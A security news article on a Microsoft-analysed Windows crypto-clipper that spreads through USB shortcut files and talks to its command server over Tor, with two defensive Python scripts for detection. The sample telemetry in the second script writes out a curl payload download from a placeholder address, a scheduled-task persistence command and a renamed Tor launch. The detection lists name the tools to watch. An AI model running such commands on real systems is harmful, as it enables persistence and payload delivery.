
Microsoft tracks Tor-based Windows crypto-clipper with USB worm


CyberSecureFox Editorial Team


The Microsoft Defender Security Research team has published an in-depth analysis of a Windows crypto-clipper campaign that combines worm-like propagation via USB drives, command-and-control traffic routed through an embedded Tor client, and replacement of cryptocurrency addresses in the clipboard. According to Microsoft, the campaign has likely been active since February 2026. The threat is relevant to any Windows user who works with cryptocurrency wallets, and it is notable because it turns a financially motivated stealer into a full-fledged lightweight backdoor with remote code execution capabilities.

Infection chain: from USB to Tor

The initial attack vector is a malicious Windows Shortcut (LNK) file distributed via USB drives. When the shortcut is opened, it launches a worm component that checks whether the machine is already infected and downloads the payload from a remote server only if no previous infection is found.

The worm implements a simple social-engineering trick at the file-system level: it scans the USB device for documents in common formats (DOC, XLSX, PDF), hides the original files, and creates LNK shortcuts with the same names in their place. Believing they are opening a regular document, the user actually runs malicious code. At the same time, the worm copies itself to other connected USB drives and creates scheduled tasks to ensure persistence for both components, the worm and the stealer.
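A practical check for the masquerade pattern described above: a scan of a removable drive that flags every .lnk whose name coincides with a document next to it (either the same name with a swapped extension, or the double-extension form "report.docx.lnk") and reports whether that document carries the Windows Hidden attribute. This is an added illustration written for this article, not Microsoft's detection logic or code from the campaign; the list of document extensions, the folder layout built by build_demo_drive() and the file names in it are constructed sample data.

```python
import os
import stat
import tempfile
from pathlib import Path

# Document formats the worm is reported to hide and replace. The article names
# DOC, XLSX and PDF; the .docx and .xls variants are an assumption added here.
DOC_EXTENSIONS = {".doc", ".docx", ".xls", ".xlsx", ".pdf"}


def is_hidden(path: Path) -> bool:
    """True if the file carries the Windows Hidden attribute (always False on other OSes)."""
    attrs = getattr(path.stat(), "st_file_attributes", 0)  # field exists only on Windows
    return bool(attrs & getattr(stat, "FILE_ATTRIBUTE_HIDDEN", 0))


def find_masqueraded_shortcuts(root: Path) -> list[dict]:
    """Return one finding per .lnk that shares its name with a document in the same folder.

    Both 'report.lnk' beside 'report.docx' and the double-extension form
    'report.docx.lnk' beside 'report.docx' are matched.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        folder = Path(dirpath)
        docs_by_key: dict[str, set[Path]] = {}
        shortcuts = []
        for name in files:
            p = folder / name
            if p.suffix.lower() == ".lnk":
                shortcuts.append(p)
            elif p.suffix.lower() in DOC_EXTENSIONS:
                # index each document by its full name ("report.docx") and by its stem ("report")
                docs_by_key.setdefault(p.name.lower(), set()).add(p)
                docs_by_key.setdefault(p.stem.lower(), set()).add(p)
        for lnk in shortcuts:
            base = lnk.name[:-len(".lnk")].lower()  # strip only the .lnk suffix
            for doc in sorted(docs_by_key.get(base, ())):
                findings.append({
                    "shortcut": str(lnk),
                    "shadowed_document": str(doc),
                    "document_hidden": is_hidden(doc),
                })
    return findings


def build_demo_drive() -> Path:
    """Create a throwaway folder imitating an infected USB root (constructed sample data)."""
    root = Path(tempfile.mkdtemp(prefix="usb_demo_"))
    for name in ("Q1 report.docx", "Q1 report.lnk",   # classic same-name pair
                 "invoice.pdf", "invoice.pdf.lnk",     # double-extension pair
                 "notes.txt", "notes.lnk",             # .txt is not a targeted format
                 "budget.xlsx"):                       # document with no shortcut
        (root / name).write_bytes(b"")
    return root


if __name__ == "__main__":
    for f in find_masqueraded_shortcuts(build_demo_drive()):
        print(f"{f['shortcut']} shadows {f['shadowed_document']} (hidden={f['document_hidden']})")
```

Run it against the mount point of a drive you want to triage instead of the demo folder; on a real Windows host a shadowed document reported as hidden is the strongest indicator, since a user rarely hides their own files next to a same-named shortcut.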

Clipper architecture: script engine instead of binary implant

The architectural design chosen by the malware authors deserves special attention. The clipper uses WScript and ActiveXObject to interact with the operating system, an approach that removes the need for a traditional installer and reduces the likelihood of detection by static antivirus signatures. Instead of connecting to a command server over public IP infrastructure, the malware deploys a portable Tor client and routes all traffic through a local SOCKS5 proxy to a hidden service (.onion).

The evasion mechanism is noteworthy: the malware terminates if it detects Task Manager among the active processes. This is a simple but effective check, designed so that an analyst or a suspicious user who opens Task Manager sees no suspicious activity.

Final stage: from stealer to backdoor

At the final stage, the malware launches a renamed Tor binary in a hidden window, generates a unique victim identifier, and registers it on the command server. After that, it enters a continuous loop with two parallel tasks:

  • Clipboard monitoring roughly every 500 milliseconds: harvesting seed phrases and private keys, and replacing copied cryptocurrency wallet addresses with attacker-controlled addresses
  • Polling the command server for instructions, including the ability to execute arbitrary code via the EVAL command

It is the presence of the EVAL command that turns a financially motivated clipper into a full-fledged backdoor. As Microsoft notes, the malware “mixes data theft with remote code execution,” allowing operators to expand its functionality at any moment, from exfiltrating screenshots (already implemented) to loading additional modules.

Impact assessment

The highest risk is to users and organizations that handle cryptocurrency assets on Windows systems, especially in environments where USB drives are used for file exchange. Worm-like propagation via USB makes the threat particularly dangerous for organizations with insufficient control over removable media: corporate environments with shared workstations, educational institutions, and small businesses.

The clipboard polling frequency (every 500 ms) virtually guarantees interception of a copied wallet address before the user has time to paste it. At the same time, the use of Tor for communication with the command server significantly complicates network-based detection and blocking at the perimeter level.

Defense recommendations

Microsoft recommends prioritizing behavior-based detection over static signatures. Specific measures include:

  1. Disable AutoRun/AutoPlay for all removable media
  2. Block execution of LNK files from removable drives via Group Policy (GPO)
  3. Restrict the use of wscript.exe and cscript.exe, prohibiting execution for users who do not need script engines for their work
  4. Configure detection of curl, cmd.exe, PowerShell, or atypical executables being launched via WScript, CScript, and similar script engines
  5. Monitor behavior related to the clipboard and screen capture on devices that process financial transactions
  6. Track the appearance of Tor processes or unusual SOCKS5 proxies on workstations
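Items 4 and 6 of the list above are detection rules, so here they are expressed as code run over constructed process-creation and network-connection records in the shape of Sysmon Event ID 1 and Event ID 3 fields (Image, ParentImage, CommandLine, DestinationIp, DestinationPort). This is an added example for this article, not Microsoft's rules or any product's logic. Assumptions beyond the text: mshta.exe is counted as a "similar" script engine, pwsh.exe as the PowerShell 7 binary, the trusted-directory allowlist is a placeholder, and every path, user name, host and address in SAMPLE_EVENTS is constructed (203.0.113.5 is a documentation address). The Tor option names and the ports 9050/9150 are real Tor defaults, included because a renamed binary still has to be started with tor's own options.

```python
import ntpath

# Script engines named in the article; mshta.exe is an assumption added here.
SCRIPT_ENGINES = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Children the article calls out; pwsh.exe added for PowerShell 7.
SUSPICIOUS_CHILDREN = {"curl.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}
# Placeholder allowlist: children of a script engine outside these paths are "atypical".
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Real tor command-line options; they give away a renamed tor binary.
TOR_CLI_MARKERS = ("socksport", "datadirectory", "hiddenservicedir", "torrc")
# Default SOCKS ports of tor (9050) and Tor Browser (9150).
LOCAL_SOCKS_PORTS = {9050, 9150}


def _alert(rule: str, ev: dict, detail: str) -> dict:
    return {"rule": rule, "image": ev["Image"], "detail": detail}


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows path (ntpath works on any host OS)."""
    return ntpath.basename(path).lower()


def check_process_create(ev: dict) -> list[dict]:
    """Rules for a process-creation record (recommendation 4 and the Tor part of 6)."""
    alerts = []
    child, parent = image_name(ev["Image"]), image_name(ev["ParentImage"])
    cmd = ev.get("CommandLine", "").lower()
    if parent in SCRIPT_ENGINES:
        if child in SUSPICIOUS_CHILDREN:
            alerts.append(_alert("script-engine-spawns-tool", ev, f"{parent} launched {child}"))
        elif not ev["Image"].lower().startswith(TRUSTED_PREFIXES):
            alerts.append(_alert("script-engine-spawns-untrusted-path", ev,
                                 f"{parent} launched {ev['Image']}"))
    if child == "tor.exe" or any(marker in cmd for marker in TOR_CLI_MARKERS):
        alerts.append(_alert("tor-process", ev, "tor binary name or tor options on the command line"))
    return alerts


def check_network_connect(ev: dict) -> list[dict]:
    """Rule for a network-connection record: any local SOCKS connect is unusual on a workstation."""
    if ev.get("DestinationIp") in {"127.0.0.1", "::1"} and ev.get("DestinationPort") in LOCAL_SOCKS_PORTS:
        return [_alert("localhost-socks-connect", ev,
                       f"{image_name(ev['Image'])} -> {ev['DestinationIp']}:{ev['DestinationPort']}")]
    return []


def detect(events: list[dict]) -> list[dict]:
    """Dispatch each record to the matching rule set and collect the alerts."""
    alerts = []
    for ev in events:
        if ev["EventID"] == 1:
            alerts.extend(check_process_create(ev))
        elif ev["EventID"] == 3:
            alerts.extend(check_network_connect(ev))
    return alerts


# Constructed sample telemetry mirroring the chain described in the article.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'wscript.exe //B "E:\Q1 report.js"'},                              # benign-looking on its own
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"curl.exe -s -o C:\Users\alice\AppData\Local\Temp\st.js http://203.0.113.5/st.js"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r'cmd.exe /c schtasks /create /tn Updater /tr "C:\Users\alice\AppData\Roaming\svc\updater.exe"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe"},        # normal user launch
    {"EventID": 1, "Image": r"C:\Users\alice\AppData\Roaming\svc\updater.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe", "CommandLine": "updater.exe --quiet"},
    {"EventID": 1, "Image": r"C:\Users\alice\AppData\Local\Temp\svchost.exe",          # renamed tor binary
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"svchost.exe SocksPort 9050 DataDirectory C:\Users\alice\AppData\Local\Temp\td"},
    {"EventID": 1, "Image": r"C:\Program Files\Tor Browser\Browser\TorBrowser\Tor\tor.exe",
     "ParentImage": r"C:\Program Files\Tor Browser\Browser\firefox.exe", "CommandLine": "tor.exe"},
    {"EventID": 3, "Image": r"C:\Windows\System32\wscript.exe",
     "DestinationIp": "127.0.0.1", "DestinationPort": 9050},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['rule']}] {a['image']}: {a['detail']}")
```

Note that the renamed-binary record fires two rules at once (an untrusted path spawned by a script engine, and tor options on its command line); correlating those on one process is a far stronger signal than either alone, and the localhost SOCKS rule will also catch the case where the operators drop the tell-tale options into a torrc file instead.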

Organizations working with cryptocurrency assets should immediately review their removable-media policies and ensure that AutoRun is disabled and script execution via WSH is restricted on all workstations. Given that the malware is actively used in attacks and can evolve through the EVAL mechanism, any delay in implementing these measures directly widens the window of opportunity for cryptocurrency theft and system compromise.
